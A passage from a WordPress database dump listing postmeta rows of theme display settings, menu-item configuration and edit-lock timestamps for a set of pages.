:{i:0;s:3:\"all\";}'),(1624,6275,'nectar-metabox-portfolio-display-sortable','off'),(1625,6275,'_nectar_full_screen_rows','off'),(1626,6275,'_nectar_full_screen_rows_animation','none'),(1627,6275,'_nectar_full_screen_rows_animation_speed','medium'),(1628,6275,'_nectar_full_screen_rows_overall_bg_color',''),(1629,6275,'_nectar_full_screen_rows_anchors','off'),(1630,6275,'_nectar_full_screen_rows_mobile_disable','off'),(1631,6275,'_nectar_full_screen_rows_row_bg_animation','none'),(1632,6275,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1633,6275,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1634,6275,'_nectar_full_screen_rows_footer','none'),(1635,6275,'_nectar_slider_bg_type','image_bg'),(1636,6275,'_nectar_canvas_shapes',''),(1637,6275,'_nectar_media_upload_webm',''),(1638,6275,'_nectar_media_upload_mp4',''),(1639,6275,'_nectar_media_upload_ogv',''),(1640,6275,'_nectar_slider_preview_image',''),(1641,6275,'_nectar_header_bg',''),(1642,6275,'_nectar_header_parallax','off'),(1643,6275,'_nectar_header_box_roll','off'),(1644,6275,'_nectar_header_bg_height',''),(1645,6275,'_nectar_header_fullscreen','off'),(1646,6275,'_nectar_header_title',''),(1647,6275,'_nectar_header_subtitle',''),(1648,6275,'_nectar_page_header_text-effect','none'),(1649,6275,'_nectar_particle_rotation_timing',''),(1650,6275,'_nectar_particle_disable_explosion','off'),(1651,6275,'_nectar_page_header_alignment','left'),(1652,6275,'_nectar_page_header_alignment_v','middle'),(1653,6275,'_nectar_page_header_bg_alignment','center'),(1654,6275,'_nectar_header_bg_color',''),(1655,6275,'_nectar_header_font_color',''),(1656,6275,'_nectar_header_bg_overlay_color',''),(1657,6275,'_disable_transparent_header','off'),(1658,6275,'_force_transparent_header','off'),(1659,6275,'_wpb_vc_js_status','false'),(1660,6275,'_dp_original','6266'),(1661,6275,'_edit_lock','1514431186:1'),(1662,6275,'_edit_last','1'),(1663,6277,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1664,6277,'_menu_item_type','post_type'),(1665,6277,'_menu_item_menu_item_parent','6268'),(1666,6277,'_menu_item_object_id','6275'),(1667,6277,'_menu_item_object','page'),(1668,6277,'_menu_item_target',''),(1669,6277,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1670,6277,'_menu_item_xfn',''),(1671,6277,'_menu_item_url',''),(1673,6278,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1674,6278,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1675,6278,'_wp_page_template','default'),(1676,6278,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(1677,6278,'nectar-metabox-portfolio-display-sortable','off'),(1678,6278,'_nectar_full_screen_rows','off'),(1679,6278,'_nectar_full_screen_rows_animation','none'),(1680,6278,'_nectar_full_screen_rows_animation_speed','medium'),(1681,6278,'_nectar_full_screen_rows_overall_bg_color',''),(1682,6278,'_nectar_full_screen_rows_anchors','off'),(1683,6278,'_nectar_full_screen_rows_mobile_disable','off'),(1684,6278,'_nectar_full_screen_rows_row_bg_animation','none'),(1685,6278,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1686,6278,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1687,6278,'_nectar_full_screen_rows_footer','none'),(1688,6278,'_nectar_slider_bg_type','image_bg'),(1689,6278,'_nectar_canvas_shapes',''),(1690,6278,'_nectar_media_upload_webm',''),(1691,6278,'_nectar_media_upload_mp4',''),(1692,6278,'_nectar_media_upload_ogv',''),(1693,6278,'_nectar_slider_preview_image',''),(1694,6278,'_nectar_header_bg',''),(1695,6278,'_nectar_header_parallax','off'),(1696,6278,'_nectar_header_box_roll','off'),(1697,6278,'_nectar_header_bg_height',''),(1698,6278,'_nectar_header_fullscreen','off'),(1699,6278,'_nectar_header_title',''),(1700,6278,'_nectar_header_subtitle',''),(1701,6278,'_nectar_page_header_text-effect','none'),(1702,6278,'_nectar_particle_rotation_timing',''),(1703,6278,'_nectar_particle_disable_explosion','off'),(1704,6278,'_nectar_page_header_alignment','left'),(1705,6278,'_nectar_page_header_alignment_v','middle'),(1706,6278,'_nectar_page_header_bg_alignment','center'),(1707,6278,'_nectar_header_bg_color',''),(1708,6278,'_nectar_header_font_color',''),(1709,6278,'_nectar_header_bg_overlay_color',''),(1710,6278,'_disable_transparent_header','off'),(1711,6278,'_force_transparent_header','off'),(1712,6278,'_wpb_vc_js_status','false'),(1713,6278,'_dp_original','6266'),(1714,6278,'_edit_lock','1514351359:1'),(1715,6278,'_edit_last','1'),(1716,6280,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1717,6280,'_menu_item_type','post_type'),(1718,6280,'_menu_item_menu_item_parent','6268'),(1719,6280,'_menu_item_object_id','6278'),(1720,6280,'_menu_item_object','page'),(1721,6280,'_menu_item_target',''),(1722,6280,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1723,6280,'_menu_item_xfn',''),(1724,6280,'_menu_item_url',''),(1726,6281,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1727,6281,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1728,6281,'_wp_page_template','default'),(1729,6281,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(1730,6281,'nectar-metabox-portfolio-display-sortable','off'),(1731,6281,'_nectar_full_screen_rows','off'),(1732,6281,'_nectar_full_screen_rows_animation','none'),(1733,6281,'_nectar_full_screen_rows_animation_speed','medium'),(1734,6281,'_nectar_full_screen_rows_overall_bg_color',''),(1735,6281,'_nectar_full_screen_rows_anchors','off'),(1736,6281,'_nectar_full_screen_rows_mobile_disable','off'),(1737,6281,'_nectar_full_screen_rows_row_bg_animation','none'),(1738,6281,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1739,6281,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1740,6281,'_nectar_full_screen_rows_footer','none'),(1741,6281,'_nectar_slider_bg_type','image_bg'),(1742,6281,'_nectar_canvas_shapes',''),(1743,6281,'_nectar_media_upload_webm',''),(1744,6281,'_nectar_media_upload_mp4',''),(1745,6281,'_nectar_media_upload_ogv',''),(1746,6281,'_nectar_slider_preview_image',''),(1747,6281,'_nectar_header_bg',''),(1748,6281,'_nectar_header_parallax','off'),(1749,6281,'_nectar_header_box_roll','off'),(1750,6281,'_nectar_header_bg_height',''),(1751,6281,'_nectar_header_fullscreen','off'),(1752,6281,'_nectar_header_title',''),(1753,6281,'_nectar_header_subtitle',''),(1754,6281,'_nectar_page_header_text-effect','none'),(1755,6281,'_nectar_particle_rotation_timing',''),(1756,6281,'_nectar_particle_disable_explosion','off'),(1757,6281,'_nectar_page_header_alignment','left'),(1758,6281,'_nectar_page_header_alignment_v','middle'),(1759,6281,'_nectar_page_header_bg_alignment','center'),(1760,6281,'_nectar_header_bg_color',''),(1761,6281,'_nectar_header_font_color',''),(1762,6281,'_nectar_header_bg_overlay_color',''),(1763,6281,'_disable_transparent_header','off'),(1764,6281,'_force_transparent_header','off'),(1765,6281,'_wpb_vc_js_status','false'),(1766,6281,'_dp_original','6266'),(1767,6281,'_edit_lock','1514351420:1'),(1768,6281,'_edit_last','1'),(1769,6283,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1770,6283,'_menu_item_type','post_type'),(1771,6283,'_menu_item_menu_item_parent','6268'),(1772,6283,'_menu_item_object_id','6281'),(1773,6283,'_menu_item_object','page'),(1774,6283,'_menu_item_target',''),(1775,6283,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1776,6283,'_menu_item_xfn',''),(1777,6283,'_menu_item_url',''),(1779,6284,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1780,6284,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1781,6284,'_wp_page_template','default'),(1782,6284,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(1783,6284,'nectar-metabox-portfolio-display-sortable','off'),(1784,6284,'_nectar_full_screen_rows','off'),(1785,6284,'_nectar_full_screen_rows_animation','none'),(1786,6284,'_nectar_full_screen_rows_animation_speed','medium'),(1787,6284,'_nectar_full_screen_rows_overall_bg_color',''),(1788,6284,'_nectar_full_screen_rows_anchors','off'),(1789,6284,'_nectar_full_screen_rows_mobile_disable','off'),(1790,6284,'_nectar_full_screen_rows_row_bg_animation','none'),(1791,6284,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1792,6284,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1793,6284,'_nectar_full_screen_rows_footer','none'),(1794,6284,'_nectar_slider_bg_type','image_bg'),(1795,6284,'_nectar_canvas_shapes',''),(1796,6284,'_nectar_media_upload_webm',''),(1797,6284,'_nectar_media_upload_mp4',''),(1798,6284,'_nectar_media_upload_ogv',''),(1799,6284,'_nectar_slider_preview_image',''),(1800,6284,'_nectar_header_bg',''),(1801,6284,'_nectar_header_parallax','off'),(1802,6284,'_nectar_header_box_roll','off'),(1803,6284,'_nectar_header_bg_height',''),(1804,6284,'_nectar_header_fullscreen','off'),(1805,6284,'_nectar_header_title',''),(1806,6284,'_nectar_header_subtitle',''),(1807,6284,'_nectar_page_header_text-effect','none'),(1808,6284,'_nectar_particle_rotation_timing',''),(1809,6284,'_nectar_particle_disable_explosion','off'),(1810,6284,'_nectar_page_header_alignment','left'),(1811,6284,'_nectar_page_header_alignment_v','middle'),(1812,6284,'_nectar_page_header_bg_alignment','center'),(1813,6284,'_nectar_header_bg_color',''),(1814,6284,'_nectar_header_font_color',''),(1815,6284,'_nectar_header_bg_overlay_color',''),(1816,6284,'_disable_transparent_header','off'),(1817,6284,'_force_transparent_header','off'),(1818,6284,'_wpb_vc_js_status','false'),(1819,6284,'_dp_original','6266'),(1820,6284,'_edit_lock','1514351473:1'),(1821,6284,'_edit_last','1'),(1822,6286,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1823,6286,'_menu_item_type','post_type'),(1824,6286,'_menu_item_menu_item_parent','6268'),(1825,6286,'_menu_item_object_id','6284'),(1826,6286,'_menu_item_object','page'),(1827,6286,'_menu_item_target',''),(1828,6286,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1829,6286,'_menu_item_xfn',''),(1830,6286,'_menu_item_url',''),(1832,6287,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1833,6287,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1834,6287,'_wp_page_template','default'),(1835,6287,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(1836,6287,'nectar-metabox-portfolio-display-sortable','off'),(1837,6287,'_nectar_full_screen_rows','off'),(1838,6287,'_nectar_full_screen_rows_animation','none'),(1839,6287,'_nectar_full_screen_rows_animation_speed','medium'),(1840,6287,'_nectar_full_screen_rows_overall_bg_color',''),(1841,6287,'_nectar_full_screen_rows_anchors','off'),(1842,6287,'_nectar_full_screen_rows_mobile_disable','off'),(1843,6287,'_nectar_full_screen_rows_row_bg_animation','none'),(1844,6287,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1845,6287,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1846,6287,'_nectar_full_screen_rows_footer','none'),(1847,6287,'_nectar_slider_bg_type','image_bg'),(1848,6287,'_nectar_canvas_shapes',''),(1849,6287,'_nectar_media_upload_webm',''),(1850,6287,'_nectar_media_upload_mp4',''),(1851,6287,'_nectar_media_upload_ogv',''),(1852,6287,'_nectar_slider_preview_image',''),(1853,6287,'_nectar_header_bg',''),(1854,6287,'_nectar_header_parallax','off'),(1855,6287,'_nectar_header_box_roll','off'),(1856,6287,'_nectar_header_bg_height',''),(1857,6287,'_nectar_header_fullscreen','off'),(1858,6287,'_nectar_header_title',''),(1859,6287,'_nectar_header_subtitle',''),(1860,6287,'_nectar_page_header_text-effect','none'),(1861,6287,'_nectar_particle_rotation_timing',''),(1862,6287,'_nectar_particle_disable_explosion','off'),(1863,6287,'_nectar_page_header_alignment','left'),(1864,6287,'_nectar_page_header_alignment_v','middle'),(1865,6287,'_nectar_page_header_bg_alignment','center'),(1866,6287,'_nectar_header_bg_color',''),(1867,6287,'_nectar_header_font_color',''),(1868,6287,'_nectar_header_bg_overlay_color',''),(1869,6287,'_disable_transparent_header','off'),(1870,6287,'_force_transparent_header','off'),(1871,6287,'_wpb_vc_js_status','false'),(1872,6287,'_dp_original','6266'),(1873,6287,'_edit_lock','1514352049:1'),(1874,6287,'_edit_last','1'),(1875,6289,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1876,6289,'_menu_item_type','post_type'),(1877,6289,'_menu_item_menu_item_parent','6268'),(1878,6289,'_menu_item_object_id','6287'),(1879,6289,'_menu_item_object','page'),(1880,6289,'_menu_item_target',''),(1881,6289,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1882,6289,'_menu_item_xfn',''),(1883,6289,'_menu_item_url',''),(1885,6290,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1886,6290,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1887,6290,'_wp_page_template','default'),(1888,6290,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(1889,6290,'nectar-metabox-portfolio-display-sortable','off'),(1890,6290,'_nectar_full_screen_rows','off'),(1891,6290,'_nectar_full_screen_rows_animation','none'),(1892,6290,'_nectar_full_screen_rows_animation_speed','medium'),(1893,6290,'_nectar_full_screen_rows_overall_bg_color',''),(1894,6290,'_nectar_full_screen_rows_anchors','off'),(1895,6290,'_nectar_full_screen_rows_mobile_disable','off'),(1896,6290,'_nectar_full_screen_rows_row_bg_animation','none'),(1897,6290,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1898,6290,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1899,6290,'_nectar_full_screen_rows_footer','none'),(1900,6290,'_nectar_slider_bg_type','image_bg'),(1901,6290,'_nectar_canvas_shapes',''),(1902,6290,'_nectar_media_upload_webm',''),(1903,6290,'_nectar_media_upload_mp4',''),(1904,6290,'_nectar_media_upload_ogv',''),(1905,6290,'_nectar_slider_preview_image',''),(1906,6290,'_nectar_header_bg',''),(1907,6290,'_nectar_header_parallax','off'),(1908,6290,'_nectar_header_box_roll','off'),(1909,6290,'_nectar_header_bg_height',''),(1910,6290,'_nectar_header_fullscreen','off'),(1911,6290,'_nectar_header_title',''),(1912,6290,'_nectar_header_subtitle',''),(1913,6290,'_nectar_page_header_text-effect','none'),(1914,6290,'_nectar_particle_rotation_timing',''),(1915,6290,'_nectar_particle_disable_explosion','off'),(1916,6290,'_nectar_page_header_alignment','left'),(1917,6290,'_nectar_page_header_alignment_v','middle'),(1918,6290,'_nectar_page_header_bg_alignment','center'),(1919,6290,'_nectar_header_bg_color',''),(1920,6290,'_nectar_header_font_color',''),(1921,6290,'_nectar_header_bg_overlay_color',''),(1922,6290,'_disable_transparent_header','off'),(1923,6290,'_force_transparent_header','off'),(1924,6290,'_wpb_vc_js_status','false'),(1925,6290,'_dp_original','6266'),(1926,6290,'_edit_lock','1514352193:1'),(1927,6290,'_edit_last','1'),(1928,6292,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1929,6292,'_menu_item_type','post_type'),(1930,6292,'_menu_item_menu_item_parent','6268'),(1931,6292,'_menu_item_object_id','6290'),(1932,6292,'_menu_item_object','page'),(1933,6292,'_menu_item_target',''),(1934,6292,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1935,6292,'_menu_item_xfn',''),(1936,6292,'_menu_item_url',''),(1938,6293,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1939,6293,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1940,6293,'_wp_page_template','default'),(1941,6293,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(1942,6293,'nectar-metabox-portfolio-display-sortable','off'),(1943,6293,'_nectar_full_screen_rows','off'),(1944,6293,'_nectar_full_screen_rows_animation','none'),(1945,6293,'_nectar_full_screen_rows_animation_speed','medium'),(1946,6293,'_nectar_full_screen_rows_overall_bg_color',''),(1947,6293,'_nectar_full_screen_rows_anchors','off'),(1948,6293,'_nectar_full_screen_rows_mobile_disable','off'),(1949,6293,'_nectar_full_screen_rows_row_bg_animation','none'),(1950,6293,'_nectar_full_screen_rows_dot_navigation','tooltip'),(1951,6293,'_nectar_full_screen_rows_content_overflow','scrollbar'),(1952,6293,'_nectar_full_screen_rows_footer','none'),(1953,6293,'_nectar_slider_bg_type','image_bg'),(1954,6293,'_nectar_canvas_shapes',''),(1955,6293,'_nectar_media_upload_webm',''),(1956,6293,'_nectar_media_upload_mp4',''),(1957,6293,'_nectar_media_upload_ogv',''),(1958,6293,'_nectar_slider_preview_image',''),(1959,6293,'_nectar_header_bg',''),(1960,6293,'_nectar_header_parallax','off'),(1961,6293,'_nectar_header_box_roll','off'),(1962,6293,'_nectar_header_bg_height',''),(1963,6293,'_nectar_header_fullscreen','off'),(1964,6293,'_nectar_header_title',''),(1965,6293,'_nectar_header_subtitle',''),(1966,6293,'_nectar_page_header_text-effect','none'),(1967,6293,'_nectar_particle_rotation_timing',''),(1968,6293,'_nectar_particle_disable_explosion','off'),(1969,6293,'_nectar_page_header_alignment','left'),(1970,6293,'_nectar_page_header_alignment_v','middle'),(1971,6293,'_nectar_page_header_bg_alignment','center'),(1972,6293,'_nectar_header_bg_color',''),(1973,6293,'_nectar_header_font_color',''),(1974,6293,'_nectar_header_bg_overlay_color',''),(1975,6293,'_disable_transparent_header','off'),(1976,6293,'_force_transparent_header','off'),(1977,6293,'_wpb_vc_js_status','false'),(1978,6293,'_dp_original','6266'),(1979,6293,'_edit_lock','1514352308:1'),(1980,6293,'_edit_last','1'),(1981,6295,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1982,6295,'_menu_item_type','post_type'),(1983,6295,'_menu_item_menu_item_parent','6268'),(1984,6295,'_menu_item_object_id','6293'),(1985,6295,'_menu_item_object','page'),(1986,6295,'_menu_item_target',''),(1987,6295,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1988,6295,'_menu_item_xfn',''),(1989,6295,'_menu_item_url',''),(2975,6320,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(2976,6320,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(2977,6320,'_wp_page_template','default'),(2978,6320,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(2979,6320,'nectar-metabox-portfolio-display-sortable','off'),(2980,6320,'_nectar_full_screen_rows','off'),(2981,6320,'_nectar_full_screen_rows_animation','none'),(2982,6320,'_nectar_full_screen_rows_animation_speed','medium'),(2983,6320,'_nectar_full_screen_rows_overall_bg_color',''),(2984,6320,'_nectar_full_screen_rows_anchors','off'),(2985,6320,'_nectar_full_screen_rows_mobile_disable','off'),(2986,6320,'_nectar_full_screen_rows_row_bg_animation','none'),(2987,6320,'_nectar_full_screen_rows_dot_navigation','tooltip'),(2988,6320,'_nectar_full_screen_rows_content_overflow','scrollbar'),(2989,6320,'_nectar_full_screen_rows_footer','none'),(2990,6320,'_nectar_slider_bg_type','image_bg'),(2991,6320,'_nectar_canvas_shapes',''),(2992,6320,'_nectar_media_upload_webm',''),(2993,6320,'_nectar_media_upload_mp4',''),(2994,6320,'_nectar_media_upload_ogv',''),(2995,6320,'_nectar_slider_preview_image',''),(2996,6320,'_nectar_header_bg',''),(2997,6320,'_nectar_header_parallax','off'),(2998,6320,'_nectar_header_box_roll','off'),(2999,6320,'_nectar_header_bg_height',''),(3000,6320,'_nectar_header_fullscreen','off'),(3001,6320,'_nectar_header_title',''),(3002,6320,'_nectar_header_subtitle',''),(3003,6320,'_nectar_page_header_text-effect','none'),(3004,6320,'_nectar_particle_rotation_timing',''),(3005,6320,'_nectar_particle_disable_explosion','off'),(3006,6320,'_nectar_page_header_alignment','left'),(3007,6320,'_nectar_page_header_alignment_v','middle'),(3008,6320,'_nectar_page_header_bg_alignment','center'),(3009,6320,'_nectar_header_bg_color',''),(3010,6320,'_nectar_header_font_color',''),(3011,6320,'_nectar_header_bg_overlay_color',''),(3012,6320,'_disable_transparent_header','off'),(3013,6320,'_force_transparent_header','off'),(3014,6320,'_wpb_vc_js_status','false'),(3015,6320,'_dp_original','6266'),(3176,6320,'_edit_lock','1514352601:1'),(3177,6320,'_edit_last','1'),(3178,6350,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3179,6350,'_menu_item_type','post_type'),(3180,6350,'_menu_item_menu_item_parent','6268'),(3181,6350,'_menu_item_object_id','6320'),(3182,6350,'_menu_item_object','page'),(3183,6350,'_menu_item_target',''),(3184,6350,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3185,6350,'_menu_item_xfn',''),(3186,6350,'_menu_item_url',''),(3190,6353,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3191,6353,'_edit_last','1'),(3192,6353,'_wp_page_template','default'),(3193,6353,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(3194,6353,'nectar-metabox-portfolio-display-sortable','off'),(3195,6353,'_nectar_full_screen_rows','off'),(3196,6353,'_nectar_full_screen_rows_animation','none'),(3197,6353,'_nectar_full_screen_rows_animation_speed','medium'),(3198,6353,'_nectar_full_screen_rows_overall_bg_color',''),(3199,6353,'_nectar_full_screen_rows_anchors','off'),(3200,6353,'_nectar_full_screen_rows_mobile_disable','off'),(3201,6353,'_nectar_full_screen_rows_row_bg_animation','none'),(3202,6353,'_nectar_full_screen_rows_dot_navigation','tooltip'),(3203,6353,'_nectar_full_screen_rows_content_overflow','scrollbar'),(3204,6353,'_nectar_full_screen_rows_footer','none'),(3205,6353,'_nectar_slider_bg_type','image_bg'),(3206,6353,'_nectar_canvas_shapes',''),(3207,6353,'_nectar_media_upload_webm',''),(3208,6353,'_nectar_media_upload_mp4',''),(3209,6353,'_nectar_media_upload_ogv',''),(3210,6353,'_nectar_slider_preview_image',''),(3211,6353,'_nectar_header_bg',''),(3212,6353,'_nectar_header_parallax','off'),(3213,6353,'_nectar_header_box_roll','off'),(3214,6353,'_nectar_header_bg_height',''),(3215,6353,'_nectar_header_fullscreen','off'),(3216,6353,'_nectar_header_title',''),(3217,6353,'_nectar_header_subtitle',''),(3218,6353,'_nectar_page_header_text-effect','none'),(3219,6353,'_nectar_particle_rotation_timing',''),(3220,6353,'_nectar_particle_disable_explosion','off'),(3221,6353,'_nectar_page_header_alignment','left'),(3222,6353,'_nectar_page_header_alignment_v','middle'),(3223,6353,'_nectar_page_header_bg_alignment','center'),(3224,6353,'_nectar_header_bg_color',''),(3225,6353,'_nectar_header_font_color',''),(3226,6353,'_nectar_header_bg_overlay_color',''),(3227,6353,'_disable_transparent_header','off'),(3228,6353,'_force_transparent_header','off'),(3229,6353,'_wpb_vc_js_status','false'),(3230,6353,'_edit_lock','1514352660:1'),(3231,6355,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3232,6355,'_menu_item_type','post_type'),(3233,6355,'_menu_item_menu_item_parent','0'),(3234,6355,'_menu_item_object_id','6353'),(3235,6355,'_menu_item_object','page'),(3236,6355,'_menu_item_target',''),(3237,6355,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3238,6355,'_menu_item_xfn',''),(3239,6355,'_menu_item_url',''),(3241,6356,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3242,6356,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3243,6356,'_wp_page_template','default'),(3244,6356,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(3245,6356,'nectar-metabox-portfolio-display-sortable','off'),(3246,6356,'_nectar_full_screen_rows','off'),(3247,6356,'_nectar_full_screen_rows_animation','none'),(3248,6356,'_nectar_full_screen_rows_animation_speed','medium'),(3249,6356,'_nectar_full_screen_rows_overall_bg_color',''),(3250,6356,'_nectar_full_screen_rows_anchors','off'),(3251,6356,'_nectar_full_screen_rows_mobile_disable','off'),(3252,6356,'_nectar_full_screen_rows_row_bg_animation','none'),(3253,6356,'_nectar_full_screen_rows_dot_navigation','tooltip'),(3254,6356,'_nectar_full_screen_rows_content_overflow','scrollbar'),(3255,6356,'_nectar_full_screen_rows_footer','none'),(3256,6356,'_nectar_slider_bg_type','image_bg'),(3257,6356,'_nectar_canvas_shapes',''),(3258,6356,'_nectar_media_upload_webm',''),(3259,6356,'_nectar_media_upload_mp4',''),(3260,6356,'_nectar_media_upload_ogv',''),(3261,6356,'_nectar_slider_preview_image',''),(3262,6356,'_nectar_header_bg',''),(3263,6356,'_nectar_header_parallax','off'),(3264,6356,'_nectar_header_box_roll','off'),(3265,6356,'_nectar_header_bg_height',''),(3266,6356,'_nectar_header_fullscreen','off'),(3267,6356,'_nectar_header_title',''),(3268,6356,'_nectar_header_subtitle',''),(3269,6356,'_nectar_page_header_text-effect','none'),(3270,6356,'_nectar_particle_rotation_timing',''),(3271,6356,'_nectar_particle_disable_explosion','off'),(3272,6356,'_nectar_page_header_alignment','left'),(3273,6356,'_nectar_page_header_alignment_v','middle'),(3274,6356,'_nectar_page_header_bg_alignment','center'),(3275,6356,'_nectar_header_bg_color',''),(3276,6356,'_nectar_header_font_color',''),(3277,6356,'_nectar_header_bg_overlay_color',''),(3278,6356,'_disable_transparent_header','off'),(3279,6356,'_force_transparent_header','off'),(3280,6356,'_wpb_vc_js_status','true'),(3281,6356,'_dp_original','6353'),(3282,6356,'_edit_lock','1514353013:1'),(3283,6356,'_edit_last','1'),(3284,6357,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3285,6357,'_edit_last','1'),(3286,6357,'_edit_lock','1514353007:1'),(3288,6357,'_nectar_gallery_slider','off'),(3289,6357,'_nectar_quote_author',''),(3290,6357,'_nectar_quote',''),(3291,6357,'_nectar_link',''),(3292,6357,'_nectar_video_m4v',''),(3293,6357,'_nectar_video_ogv',''),(3294,6357,'_nectar_video_poster',''),(3295,6357,'_nectar_video_embed',''),(3296,6357,'_nectar_audio_mp3',''),(3297,6357,'_nectar_audio_ogg',''),(3298,6357,'_post_item_masonry_sizing','regular'),(3299,6357,'_nectar_header_bg',''),(3300,6357,'_nectar_header_parallax','off'),(3301,6357,'_nectar_header_bg_height',''),(3302,6357,'_nectar_page_header_bg_alignment','top'),(3303,6357,'_nectar_header_bg_color',''),(3304,6357,'_nectar_header_font_color',''),(3305,6357,'_disable_transparent_header','off'),(3306,6357,'_wpb_vc_js_status','false'),(3307,6360,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3308,6360,'_menu_item_type','post_type'),(3309,6360,'_menu_item_menu_item_parent','6355'),(3310,6360,'_menu_item_object_id','6356'),(3311,6360,'_menu_item_object','page'),(3312,6360,'_menu_item_target',''),(3313,6360,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3314,6360,'_menu_item_xfn',''),(3315,6360,'_menu_item_url',''),(3317,6361,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3318,6361,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3319,6361,'_wp_page_template','default'),(3320,6361,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(3321,6361,'nectar-metabox-portfolio-display-sortable','off'),(3322,6361,'_nectar_full_screen_rows','off'),(3323,6361,'_nectar_full_screen_rows_animation','none'),(3324,6361,'_nectar_full_screen_rows_animation_speed','medium'),(3325,6361,'_nectar_full_screen_rows_overall_bg_color',''),(3326,6361,'_nectar_full_screen_rows_anchors','off'),(3327,6361,'_nectar_full_screen_rows_mobile_disable','off'),(3328,6361,'_nectar_full_screen_rows_row_bg_animation','none'),(3329,6361,'_nectar_full_screen_rows_dot_navigation','tooltip'),(3330,6361,'_nectar_full_screen_rows_content_overflow','scrollbar'),(3331,6361,'_nectar_full_screen_rows_footer','none'),(3332,6361,'_nectar_slider_bg_type','image_bg'),(3333,6361,'_nectar_canvas_shapes',''),(3334,6361,'_nectar_media_upload_webm',''),(3335,6361,'_nectar_media_upload_mp4',''),(3336,6361,'_nectar_media_upload_ogv',''),(3337,6361,'_nectar_slider_preview_image',''),(3338,6361,'_nectar_header_bg',''),(3339,6361,'_nectar_header_parallax','off'),(3340,6361,'_nectar_header_box_roll','off'),(3341,6361,'_nectar_header_bg_height',''),(3342,6361,'_nectar_header_fullscreen','off'),(3343,6361,'_nectar_header_title',''),(3344,6361,'_nectar_header_subtitle',''),(3345,6361,'_nectar_page_header_text-effect','none'),(3346,6361,'_nectar_particle_rotation_timing',''),(3347,6361,'_nectar_particle_disable_explosion','off'),(3348,6361,'_nectar_page_header_alignment','left'),(3349,6361,'_nectar_page_header_alignment_v','middle'),(3350,6361,'_nectar_page_header_bg_alignment','center'),(3351,6361,'_nectar_header_bg_color',''),(3352,6361,'_nectar_header_font_color',''),(3353,6361,'_nectar_header_bg_overlay_color',''),(3354,6361,'_disable_transparent_header','off'),(3355,6361,'_force_transparent_header','off'),(3356,6361,'_wpb_vc_js_status','false'),(3357,6361,'_dp_original','6353'),(3358,6361,'_edit_lock','1514353112:1'),(3359,6361,'_edit_last','1'),(3360,6363,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3361,6363,'_menu_item_type','post_